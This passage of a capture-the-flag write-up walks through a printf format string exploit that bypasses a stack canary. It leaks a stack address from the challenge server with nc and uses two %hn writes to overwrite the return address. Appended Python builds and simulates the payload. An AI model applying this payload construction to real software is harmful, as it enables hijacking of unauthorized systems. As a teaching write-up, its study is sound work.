The stack canary is at offset 64 and the return address is at offset 72, so a plain buffer overflow cannot reach the return address without clobbering the canary first. However, the program uses printf to echo our string back, so we can use a format string exploit to overwrite the return address directly, without touching the stack canary at all. Normally we would need a leak to learn the stack address of the return address slot, but the challenge description says ASLR is disabled on the server, which means the stack addresses are the same on every run. We can therefore work out the address once, before building the exploit.

Let’s put a breakpoint on the printf call and examine the stack again.

At offset 108 we see the return address slot, located at 0xffffd2bc. At offset 84 there is a stack pointer value, 0xffffd2c0, which is the 21st argument of the printf call (esp + 4 * 21 = esp + 84). That value is exactly 4 bytes above the return address slot, so we can leak it from the server with %21$x and calculate the address of the return address by subtracting 4 from it.

$ nc 18.223.228.52 13337
Someone told me that pwning makes noxāle...
But.........how????
0x%21$08x
0xffffdd30

Now we know the return address slot is at 0xffffdd2c (0xffffdd30 - 4), and we need to change its contents to 0x0804867b. We will do this with the %hn specifier twice, writing one halfword at a time: first 0x867b to 0xffffdd2c, then 0x0804 to 0xffffdd2e (little-endian, so the low halfword lives at the lower address). Because printf's output counter only ever grows, the second write cannot simply pad to 0x0804 bytes after the first one; it has to bring the total count to 0x10804, of which %hn stores only the low 16 bits, i.e. 0x0804.
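The two %hn writes above, as an added example that is not part of the original write-up. The Python below builds the format string payload for an arbitrary 32-bit target address and value and then runs it through a minimal model of printf's output counter to confirm which halfwords would land where. It goes slightly beyond the text: the padding is computed modulo 0x10000, so the writes work in either order (the example keeps the write-up's order, low halfword first, and therefore wraps the counter past 0x10000 for the second write). The argument index of our own buffer (`BUF_ARG`, set to 7 here) is an assumption for illustration; the page does not state where the buffer sits among printf's arguments, and on the real target it has to be found with `%N$x` probing.

```python
import re
import struct

# Values from the write-up.
RET_SLOT = 0xffffdd30 - 4      # leaked 21st argument minus 4 = address of the return address
TARGET   = 0x0804867b          # value we want in the return address slot
BUF_ARG  = 7                   # ASSUMPTION: printf argument number at which our buffer starts


def hn_writes(addr, value):
    """Split a 32-bit value into two %hn writes, low halfword at the lower address (little-endian)."""
    return [(addr, value & 0xffff), (addr + 2, (value >> 16) & 0xffff)]


def build_payload(writes, arg_index, printed_before=0):
    """Build <addresses><%Nc %A$hn ...>: address i is printf argument arg_index + i.

    Padding is computed modulo 0x10000 so a halfword smaller than the running
    output count still works: printf's counter only grows, %hn keeps the low 16 bits.
    """
    addrs = b"".join(struct.pack("<I", a) for a, _ in writes)
    if b"\x00" in addrs or b"%" in addrs:
        # NUL would terminate the string before the directives; '%' would be parsed as a directive.
        raise ValueError("address bytes would terminate or corrupt the format string")
    fmt = ""
    count = printed_before + len(addrs)        # the raw address bytes are printed too
    for i, (_, val) in enumerate(writes):
        pad = (val - count) % 0x10000
        if pad:
            fmt += "%%%dc" % pad               # %Nc prints exactly N characters
            count += pad
        fmt += "%%%d$hn" % (arg_index + i)     # store the low 16 bits of the counter
    return addrs + fmt.encode()


DIRECTIVE = re.compile(rb"%(?:(\d+)c|(\d+)\$hn)")


def simulate_printf(payload, arg_index):
    """Model of printf on the payload when the buffer itself is argument arg_index.

    Returns (halfwords written as {addr: value}, total characters printed).
    Only %Nc and %N$hn are modelled, which is all build_payload emits.
    """
    words = [struct.unpack_from("<I", payload, i)[0]
             for i in range(0, len(payload) - len(payload) % 4, 4)]
    mem, count, pos = {}, 0, 0
    while pos < len(payload):
        m = DIRECTIVE.match(payload, pos)
        if m is None:                          # literal byte (including the raw address bytes)
            count += 1
            pos += 1
            continue
        if m.group(1):                         # %Nc
            count += int(m.group(1))
        else:                                  # %N$hn: the N-th argument is a word of our buffer
            target = words[int(m.group(2)) - arg_index]
            mem[target] = count & 0xffff
        pos = m.end()
    return mem, count


def written_dword(mem, addr):
    """Reassemble the 32-bit value the two halfword writes left at addr."""
    return mem[addr] | (mem[addr + 2] << 16)


def exploit_payload():
    return build_payload(hn_writes(RET_SLOT, TARGET), BUF_ARG)


if __name__ == "__main__":
    payload = exploit_payload()
    mem, total = simulate_printf(payload, BUF_ARG)
    print(payload)
    print("bytes printed: %#x, value at %#x: %#010x" % (total, RET_SLOT, written_dword(mem, RET_SLOT)))
```

For the page's values this yields `%34419c%7$hn%33161c%8$hn` after the two addresses: the first write lands when 0x867b bytes have been printed, the second after 0x10804, which %hn truncates to 0x0804. Writing the smaller halfword first would avoid the wrap and send about half as much output; either way, make sure the receiving side reads everything the server echoes before sending more.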